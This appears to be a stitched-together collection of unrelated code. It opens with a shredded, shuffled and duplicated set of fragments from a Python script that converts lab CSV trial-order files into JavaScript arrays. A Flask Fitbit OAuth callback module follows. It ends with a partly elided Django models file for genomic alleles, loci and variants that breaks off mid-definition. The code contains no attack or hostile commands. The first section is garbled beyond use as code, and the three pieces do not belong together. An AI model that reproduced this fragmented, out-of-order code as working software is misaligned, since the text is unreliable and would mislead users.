"University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles: print(fname) stim=[]",
"row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1')",
"as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\")",
"in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2')",
"trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}', lbin:",
"corr3=[] corr2=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0])",
"{3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n')",
"{2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else:",
"using here \"\"\" import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University",
"2020 @author: craig We've been using some online order files in our original",
"if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname in testfiles:",
"os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\")",
".csv files into the .js ones we'll be using here \"\"\" import os,",
"next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for",
"\"\"\" Created on Wed Apr 1 17:05:31 2020 @author: craig We've been using",
"print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for",
"outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' + \"stim: '{0}',",
"as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v':",
"with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2])",
"# -*- coding: utf-8 -*- \"\"\" Created on Wed Apr 1 17:05:31 2020",
"\"\"\" import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California",
"outfile.close() for fname in testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[] with open(fname,\"r\")",
"web-based MST. This converts those actual .csv files into the .js ones we'll",
"outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname in testfiles: print(fname) stim=[] cond=[] lbin=[]",
"corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var",
"outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles:",
"inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for",
"print(fname) stim=[] cond=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader:",
"cond=[] lbin=[] corr3=[] corr2=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in",
"corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)):",
"row in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in",
"row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\")",
"-*- coding: utf-8 -*- \"\"\" Created on Wed Apr 1 17:05:31 2020 @author:",
"stim=[] cond=[] lbin=[] corr3=[] corr2=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row",
"i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname in testfiles: print(fname)",
"-*- \"\"\" Created on Wed Apr 1 17:05:31 2020 @author: craig We've been",
"been using some online order files in our original PsychoPy-derived web-based MST. This",
"original PsychoPy-derived web-based MST. This converts those actual .csv files into the .js",
"those actual .csv files into the .js ones we'll be using here \"\"\"",
"cond: '{1}', lbin: {2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i <",
"csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\"))",
"@author: craig We've been using some online order files in our original PsychoPy-derived",
"+ '}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname",
"cond: '{1}'\".format(stim[i],cond[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close()",
"else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname in testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[]",
"on Wed Apr 1 17:05:31 2020 @author: craig We've been using some online",
"California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles: print(fname) stim=[] cond=[] with",
"cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' +",
"in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}') if i",
"for row in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i",
"corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n')",
"corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' +",
"ones we'll be using here \"\"\" import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders')",
"lbin: {2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n')",
"for row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b':",
"stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n':",
"testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader)",
"next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif",
"i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}', lbin: {2}, corr3:",
"cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2')",
"corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close()",
"outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}',",
"corr2=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1])",
"{' + \"stim: '{0}', cond: '{1}', lbin: {2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) +",
"i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}') if",
"craig We've been using some online order files in our original PsychoPy-derived web-based",
"<filename>misc/ConvertOrdersCSVtoJS.py # -*- coding: utf-8 -*- \"\"\" Created on Wed Apr 1 17:05:31",
"+ \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else:",
"outfile.write(' {' + \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}') if i < (len(cond)-1):",
"reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0')",
"reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write('",
"PsychoPy-derived web-based MST. This converts those actual .csv files into the .js ones",
"MST. This converts those actual .csv files into the .js ones we'll be",
"converts those actual .csv files into the .js ones we'll be using here",
"'{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n')",
"row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1')",
"lbin=[] corr3=[] corr2=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader:",
"files in our original PsychoPy-derived web-based MST. This converts those actual .csv files",
"- Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles: print(fname) stim=[] cond=[] with open(fname,\"r\")",
"corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1')",
"(len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname in testfiles: print(fname) stim=[] cond=[]",
"outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname in testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[]",
"in our original PsychoPy-derived web-based MST. This converts those actual .csv files into",
"\"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n')",
"with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) infile.close()",
"stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {'",
"be using here \"\"\" import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive -",
"drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname",
"Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in",
"for i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}')",
"Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles: print(fname) stim=[] cond=[] with open(fname,\"r\") as",
"'{1}'\".format(stim[i],cond[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for",
"reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif",
"our original PsychoPy-derived web-based MST. This converts those actual .csv files into the",
"{' + \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n')",
"outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond:"
] |
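The emitted files are JavaScript object-literal arrays, not strict JSON (keys are unquoted and strings single-quoted), so they cannot simply be re-parsed with json.loads. The following sanity check is my own sketch, not part of the original script: it takes the inpath/outpath directories used above and counts CSV data rows against emitted "{stim: ...}" entries. A regex count is crude, but it avoids needing a JS parser for what is a fixed, machine-generated format.

import csv
import glob
import os
import re

def count_csv_rows(csv_fname):
    # Number of data rows (header excluded)
    with open(csv_fname, "r") as f:
        return sum(1 for _ in csv.reader(f)) - 1

def count_js_entries(js_fname):
    # Each trial was written as one "{stim: ..." object literal
    with open(js_fname, "r") as f:
        return len(re.findall(r"\{stim:", f.read()))

def check_orders(inpath, outpath):
    # Matches both the p1 (study) and p2 (test) order files
    for csv_fname in glob.glob(os.path.join(inpath, "MST*_o*csv")):
        js_fname = csv_fname.replace('csv', 'js').replace(inpath, outpath)
        if os.path.exists(js_fname):
            assert count_csv_rows(csv_fname) == count_js_entries(js_fname), js_fname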
<gh_stars>0
import base64
import logging

import requests
from flask import redirect, render_template, request, session
from requests_oauthlib import OAuth2Session

from poketrainer.app import flask_app
from poketrainer.api.syncs.fitbit import _generate_fitbit_token, \
    FITBIT_CALLBACK_URI

LOGGER = logging.getLogger(__name__)


@flask_app.route('/ui/collection/')
def collection():
    pokemon = requests.get(request.host_url + 'api/collection').json()
    return render_template('collection.html', pokemon=pokemon)


@flask_app.route('/ui/team/')
def team():
    pokemon = requests.get(request.host_url + 'api/team').json()
    return render_template('collection.html', pokemon=pokemon)


@flask_app.route('/fitbit_login/')
def fitbit_login():
    return _generate_fitbit_token()


@flask_app.route('/fitbitCallback')
def fitbit_callback():
    id_secret = (f'{flask_app.config["FITBIT_CLIENT_ID"]}:'
                 f'{flask_app.config["FITBIT_CLIENT_SECRET"]}')
    # see https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens  # noqa
    # for why we have to do this base64 stuff
    b64_creds = (base64.encodebytes(bytes(id_secret, 'utf8'))
                 .decode('utf8')
                 .rstrip())
    auth_header = {'Authorization': f'Basic {b64_creds}',
                   'Content-Type': 'application/x-www-form-urlencoded'}
    post_params = {'grant_type': 'authorization_code',
                   'code': request.args.get('code'),
                   'redirect_uri': request.host_url + FITBIT_CALLBACK_URI}
    # request the actual access token
    token = requests.post('https://api.fitbit.com/oauth2/token',
                          headers=auth_header, params=post_params).json()
    LOGGER.debug(token)
    # for some reason this fails with 'Missing access token'
    # c.f. https://github.com/requests/requests-oauthlib/issues/324
    # oauth = OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'],
    #                       redirect_uri=request.host_url + '/fitbitCallback/',
    #                       scope=['activity'])
    # token = oauth.fetch_token(
    #     token_url='https://api.fitbit.com/oauth2/token',
    #     authorization_response=request.url,
    #     include_client_id=True,
    #     client_secret=flask_app.config['FITBIT_CLIENT_SECRET'])
    session.update(
        FITBIT_REFRESH_TOKEN=token['refresh_token'])
    return redirect('/ui/collection/')
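The module stores FITBIT_REFRESH_TOKEN in the session but doesn't show the follow-up exchange. As a minimal sketch (my addition; refresh_fitbit_token is a hypothetical helper, not part of this codebase), the refresh call reuses the same Basic authorization header, with grant_type=refresh_token per the standard OAuth2 flow the Fitbit docs linked above describe:

import base64
import requests

def refresh_fitbit_token(client_id: str, client_secret: str, refresh_token: str) -> dict:
    # Hypothetical helper: exchange a stored refresh token for a new
    # access/refresh token pair using the same Basic auth scheme as above
    b64_creds = (base64.encodebytes(bytes(f'{client_id}:{client_secret}', 'utf8'))
                 .decode('utf8')
                 .rstrip())
    headers = {'Authorization': f'Basic {b64_creds}',
               'Content-Type': 'application/x-www-form-urlencoded'}
    params = {'grant_type': 'refresh_token',
              'refresh_token': refresh_token}
    return requests.post('https://api.fitbit.com/oauth2/token',
                         headers=headers, params=params).json()

Note that Fitbit rotates refresh tokens: each refresh response contains a new refresh_token, which would need to be stored back into the session in place of the old one.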
import collections
import logging
import re
from typing import Optional, Pattern, Tuple, Iterable, Set

import django.dispatch
from django.conf import settings
from django.contrib.auth.models import User
from django.db import models, IntegrityError
from django.db.models import Value as V, QuerySet, Q, F, FilteredRelation
from django.db.models.deletion import CASCADE, DO_NOTHING
from django.db.models.fields import TextField
from django.db.models.functions import Greatest
from django.db.models.functions.text import Concat
from django.urls.base import reverse
from django_extensions.db.models import TimeStampedModel
from lazy import lazy
from model_utils.managers import InheritanceManager
# ... (project-local imports not recoverable: FlagsMixin, FlagTypeContext, Wiki,
#      ClinGenAllele, GenomeBuild, GenomeBuildContig, Contig, AlleleOrigin,
#      AlleleConversionTool, ProcessingStatus, RelatedModelsPartitionModel,
#      format_chrom, md5sum_str)


class Allele(FlagsMixin, models.Model):
    """ Genome build independent - ie GRCh37 and GRCh38 variants for same change point to same allele
        This is generally done via ClinGen Allele, but that can fail.
        Linked against Variant with VariantAllele below """

    clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE)

    def get_absolute_url(self):
        return reverse('view_allele', kwargs={"pk": self.id})

    def flag_type_context(self) -> FlagTypeContext:
        return FlagTypeContext.objects.get(pk="allele")

    @lazy
    def clingen_error(self):
        error = None
        if va := self.variantallele_set.filter(error__isnull=False).first():
            error = va.error
        return error

    def variant_alleles(self):
        return self.variantallele_set.order_by("genome_build__name")

    @lazy
    def grch37(self) -> Optional['Variant']:
        try:
            return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False)
        except ValueError:
            return None

    @lazy
    def grch38(self) -> Optional['Variant']:
        try:
            return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False)
        except ValueError:
            return None

    def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant':
        vas = self.variant_alleles()
        va = None
        if genome_build:
            va = vas.filter(genome_build=genome_build).first()
            if not va and not best_attempt:
                raise ValueError(f'Could not find a variant in allele {self.id} for build {genome_build}')
        if not va:
            va = vas.first()
        if va:
            return va.variant
        raise ValueError(f'Could not find any variants in allele {self.id}')

    def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']:
        """ Used by to write VCF coordinates during liftover.
            If you know a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() """
        from snpdb.models.models_dbsnp import DbSNP
        from genes.hgvs import get_hgvs_variant_tuple

        # Check if the destination build shares a contig with an existing variant
        # (some builds share contigs, eg GRCh37/38)
        for variant_allele in self.variantallele_set.all():
            if variant_allele.variant.locus.contig in genome_build.contigs:  # membership test reconstructed
                conversion_tool = AlleleConversionTool.SAME_CONTIG
                variant_tuple = variant_allele.variant.as_tuple()
                return conversion_tool, variant_tuple

        conversion_tool = None
        g_hgvs = None
        if self.clingen_allele:
            try:
                g_hgvs = self.clingen_allele.get_g_hgvs(genome_build)
                conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY  # member name reconstructed
            except ValueError:  # contig errors all subclass from this
                pass
        if g_hgvs is None:
            if settings.LIFTOVER_DBSNP_ENABLED:
                va = self.variantallele_set.all().first()
                if dbsnp := DbSNP.get_for_variant(va.variant):  # lookup call reconstructed
                    g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt)
                    conversion_tool = AlleleConversionTool.DBSNP

        variant_tuple = None
        if g_hgvs:
            variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build)
        return conversion_tool, variant_tuple

    def merge(self, conversion_tool, other_allele: "Allele") -> bool:
        """ Merge other_allele into this allele """
        if self == other_allele:
            raise ValueError(f"Attempt to merge {self} to itself!")

        can_merge = True
        merge_log_message = f"{other_allele} merge into {self}"
        other_clingen_allele = other_allele.clingen_allele
        if other_clingen_allele and self.clingen_allele:
            can_merge = False
            merge_log_message = f"Error performing {merge_log_message}: both have ClinGen Alleles!"

        AlleleMergeLog.objects.create(old_allele=other_allele,
                                      new_allele=self,
                                      conversion_tool=conversion_tool,
                                      success=can_merge,
                                      message=merge_log_message)

        if can_merge:
            if other_clingen_allele:
                # Move across ClinGen Allele (may not have been possible to retrieve in
                # all builds, but at least one links there, and can't have another, so it'll work)
                other_allele.clingen_allele = None
                other_allele.save()
                self.clingen_allele = other_clingen_allele
                self.save()

            if other_fc := other_allele.flag_collection:
                other_fc.flag_set.update(collection=self.flag_collection_safe)
                other_fc.flagwatch_set.update(flag_collection=self.flag_collection)
                existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list("name", flat=True)
                other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection)
                other_fc.classification_set.update(flag_collection=self.flag_collection)
            existing_allele_cc_names = self.clinicalcontext_set.values_list("name", flat=True)
            # ... (re-point other_allele's remaining related objects at self)
            for va in other_allele.variantallele_set.all():  # loop reconstructed
                try:
                    va.allele = self
                    va.save()
                except IntegrityError:
                    logging.warning("VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one",
                                    va.allele, va.genome_build, va.variant)
                    va.delete()
        return can_merge

    def validate(self, liftover_complete=True):
        """ :param liftover_complete: If False does not check for missing representations """
        ...

    def __str__(self):
        name = f"Allele {self.pk}"
        if self.clingen_allele:
            name += f" ({self.clingen_allele})"
        return name

    def __format__(self, format_spec: str):
        ...


# ... (flag_collection_extra_info receiver; only the labelling loop is recoverable)
#     for allele in alleles:
#         flag_infos.set_extra_info(allele.flag_collection_id, {
#             'label': f'Allele {allele.id}'
#         }, source_object=allele)


class AlleleMergeLog(TimeStampedModel):
    """ Keep track of calls to Allele.merge() """
    old_allele = models.ForeignKey(Allele, related_name="old_allele_merge", on_delete=CASCADE)
    new_allele = models.ForeignKey(Allele, related_name="new_allele_merge", on_delete=CASCADE)
    conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)
    success = models.BooleanField(default=True)
    message = models.TextField(null=True)


VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt')


class Sequence(models.Model):
    """
        We want to guarantee seq is unique, but a unique constraint on large values
        fails with an error of: "index row requires x bytes, maximum size is 8191"
        The easiest solution is to md5sum seq and make the constraint on that.
        Another possible solution is to use Gist indexes but that requires installing
        the btree_gist extension (requires postgres Admin rights). Django 3 has
        ExclusionConstraint, Postgres contrib has BtreeGistExtension to install it
    """
    seq = models.TextField()
    seq_md5_hash = models.CharField(max_length=32, unique=True)
    length = models.IntegerField()

    def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
        if not self.seq_md5_hash:
            self.seq_md5_hash = md5sum_str(self.seq)
        super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields)

    @staticmethod
    def abbreviate(s: str, max_length: int = 20):
        if len(s) > max_length:
            s = f"{s[:3]}...{s[-3:]}"
        return s

    def __str__(self):
        return self.abbreviate(self.seq)  # body reconstructed

    @staticmethod
    def get_pk_by_seq(q=None):  # name reconstructed
        qs = Sequence.objects.all()
        if q:
            qs = qs.filter(q)
        return dict(qs.values_list("seq", "pk"))

    def is_standard_sequence(self):
        """ only contains standard bases """
        ...


class Locus(models.Model):
    contig = models.ForeignKey(Contig, on_delete=CASCADE)
    position = models.IntegerField()
    ref = models.ForeignKey(Sequence, on_delete=CASCADE)

    class Meta:
        unique_together = ("contig", "position", "ref")

    @property
    def chrom(self):
        return self.contig.name

    def __str__(self):
        return f"{self.chrom}:{self.position} {self.ref}"


class Variant(models.Model):
    """ Variants represent the different alleles at a locus
        Usually 2+ per line in a VCF file (multiple Variants with different alt alleles point
        to the same locus: 1 ref + >= 1 alts pointing to the same locus for the row)
        There is usually no Variant for the reference (but one can be created via insertion queues) """

    REFERENCE_ALT = "="
    locus = models.ForeignKey(Locus, on_delete=CASCADE)
    alt = models.ForeignKey(Sequence, on_delete=CASCADE)

    class Meta:
        unique_together = ("locus", "alt")

    @staticmethod
    def get_overlap_annotate_and_q(contig, start, end):  # name reconstructed
        annotation_kwargs = {"longest_sequence": Greatest("locus__ref__length", "alt__length"),
                             "end_position": F("locus__position") + F("longest_sequence")}
        q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start)
        return annotation_kwargs, q

    @staticmethod
    def annotate_variant_string(qs, name="variant_string", path_to_variant=""):
        """ Return a "1:123321 G>C" style string in a query """
        kwargs = {name: Concat(f"{path_to_variant}locus__contig__name", V(":"),
                               f"{path_to_variant}locus__position", V(" "),
                               f"{path_to_variant}locus__ref__seq", V(">"),
                               f"{path_to_variant}alt__seq", output_field=TextField())}
        return qs.annotate(**kwargs)

    @staticmethod
    def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str:
        if abbreviate:
            ref = Sequence.abbreviate(ref)
            alt = Sequence.abbreviate(alt)
        return f"{chrom}:{position} {ref}>{alt}"

    @staticmethod
    def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild,
                              regex_pattern: Pattern) -> VariantCoordinate:
        """ regex_pattern - has to have 4 groups, returns (chrom, position, ref, alt) """
        variant_tuple = None
        if m := regex_pattern.match(variant_string):
            chrom, position, ref, alt = m.groups()
            # ... (field cleaning, see clean_variant_fields below)
            contig = genome_build.chrom_contig_mappings[chrom]
            variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt)
        return variant_tuple

    @staticmethod
    def get_from_string(variant_string: str, genome_build: GenomeBuild,
                        regex_pattern: Pattern) -> Optional['Variant']:
        variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern)
        try:
            return Variant.get_from_tuple(variant_tuple, genome_build)
        except Variant.DoesNotExist:
            return None

    @staticmethod
    def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant':
        params = ["locus__contig__name", "locus__position", "locus__ref__seq", "alt__seq"]
        return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build,
                                   **dict(zip(params, variant_tuple)))

    @lazy
    def genome_builds(self) -> Set['GenomeBuild']:
        gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(),
                                                  contig__locus__variant=self)
        return {gbc.genome_build for gbc in gbc_qs}

    @lazy
    def coordinate(self) -> VariantCoordinate:
        locus = self.locus
        contig = locus.contig
        return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq)

    @staticmethod
